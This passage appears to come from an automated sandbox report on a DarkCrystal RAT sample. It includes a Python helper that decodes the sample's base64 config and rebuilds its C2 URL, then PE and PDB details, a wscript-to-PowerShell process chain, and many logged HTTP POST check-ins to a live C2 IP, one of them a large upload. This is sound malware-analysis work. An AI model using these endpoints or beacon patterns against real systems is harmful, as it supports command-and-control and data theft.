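    "RmFVMGx6U1dwRmQwbHFiMmxrU0VveFdsTkpjMGxxUlhoSmFtOXBaRWhLTVZwVFNYTkpha1Y1U1dwdmFX"
    "UklTakZhVTBselNXcEZla2xxYjJsa1NFb3hXbE5KYzBscVJUQkphbTlwWkVoS01WcFRTamtpWFE9PSJd"
)
C2_PARTS = [
    "http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/",
    "imageJavascriptprocessDefaultsqltest",
]
# Request line as captured in the Networking section of this report.
OBSERVED_REQUEST_LINE = (
    "POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1"
)


def _json_from_b64(s: str) -> Any | None:
    """Decode `s` as padded base64 holding a JSON object or array; None otherwise.
    Scalars are rejected so short plain values such as "true" or "1" are never
    mistaken for an encoded layer."""
    if len(s) < 4 or len(s) % 4:
        return None
    try:
        obj = json.loads(base64.b64decode(s, validate=True).decode("utf-8"))
    except ValueError:  # binascii.Error, UnicodeDecodeError, JSONDecodeError all derive from it
        return None
    return obj if isinstance(obj, (dict, list)) else None


def unwrap(value: Any, max_depth: int = 8) -> Any:
    """Recursively replace every base64-encoded JSON string with what it hides.
    `max_depth` bounds the recursion for pathological inputs."""
    if max_depth == 0:
        return value
    if isinstance(value, str):
        inner = _json_from_b64(value)
        return value if inner is None else unwrap(inner, max_depth - 1)
    if isinstance(value, list):
        return [unwrap(v, max_depth - 1) for v in value]
    if isinstance(value, dict):
        return {k: unwrap(v, max_depth - 1) for k, v in value.items()}
    return value


def params_from_nested() -> dict[str, str]:
    """Innermost layer of NESTED_BLOB: ["1", ["", "", {params}]] -> {params}."""
    outer = unwrap(NESTED_BLOB)
    return outer[1][2]


def checkin_url(parts: list[str], suffix: str) -> str:
    """Join the split C2 string and append the suffix seen on the wire."""
    return "".join(parts) + suffix


def request_path(request_line: str) -> str:
    """Path component of an HTTP request line ("METHOD path HTTP/x.y")."""
    return request_line.split(" ", 2)[1]


if __name__ == "__main__":
    print(unwrap(SHORT_BLOB))
    print(json.dumps(params_from_nested(), indent=1))
    print(checkin_url(C2_PARTS, ".php"))
```

Comparing the rebuilt URL with the path in the captured POST is a cheap consistency check between static config extraction and network capture; a mismatch would mean the sample rewrites the endpoint at runtime and the static C2 string alone is not a usable indicator.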
Source: hz7DzW2Yop.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: hz7DzW2Yop.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: hz7DzW2Yop.exe, 00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmp, hz7DzW2Yop.exe, 00000000.00000000.1666308899.0000000000933000.00000002.00000001.01000000.00000003.sdmp, hz7DzW2Yop.exe, 00000000.00000003.1669587198.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, hz7DzW2Yop.exe, 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: wC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: }C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: yC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000004E43000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
                                    Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: uAsLgsGzSk.exe, 0000002A.00000002.3042679176.0000000003FFA000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0090A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError | 0_2_0090A69B
Source: C:\Users\user\Desktop\hz7DzW2Yop.exe | Code function: 0_2_0091C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW | 0_2_0091C220
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File opened: C:\Users\user
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File opened: C:\Users\user\AppData
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | File opened: C:\Users\user\AppData\Local

                                    Software Vulnerabilities

                                    Source: C:\Windows\SysWOW64\wscript.exe  Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe  Code function: 4x nop then jmp 00007FFD9B9F2126h  5_2_00007FFD9B9E07F8
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe  Code function: 4x nop then jmp 00007FFD9B9F2126h  5_2_00007FFD9B9E0860
                                    Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe  Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh  5_2_00007FFD9BB9D1DD
                                    Source: C:\Recovery\uAsLgsGzSk.exe  Code function: 4x nop then jmp 00007FFD9BA22126h  35_2_00007FFD9BA21F1E
                                    Source: C:\Recovery\uAsLgsGzSk.exe  Code function: 4x nop then jmp 00007FFD9BA02126h  37_2_00007FFD9B9F0860

                                    Networking

                                    Source: Network traffic  Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49736 -> 89.23.100.242:80
                                    Source: Joe Sandbox View  ASN Name: MAXITEL-ASRU MAXITEL-ASRU
                                    Source: global traffic  HTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1  Content-Type: application/octet-stream  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29  Host: 89.23.100.242  Content-Length: 344  Expect: 100-continue  Connection: Keep-Alive
                                    Source: global traffic  HTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1  Content-Type: multipart/form-data; boundary=----s4VOHFAR20G8vVPIwClEHtRE0DwTdOyX8p  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29  Host: 89.23.100.242  Content-Length: 204914  Expect: 100-continue  Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2036Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2036Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2036Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2036Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.100.242Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
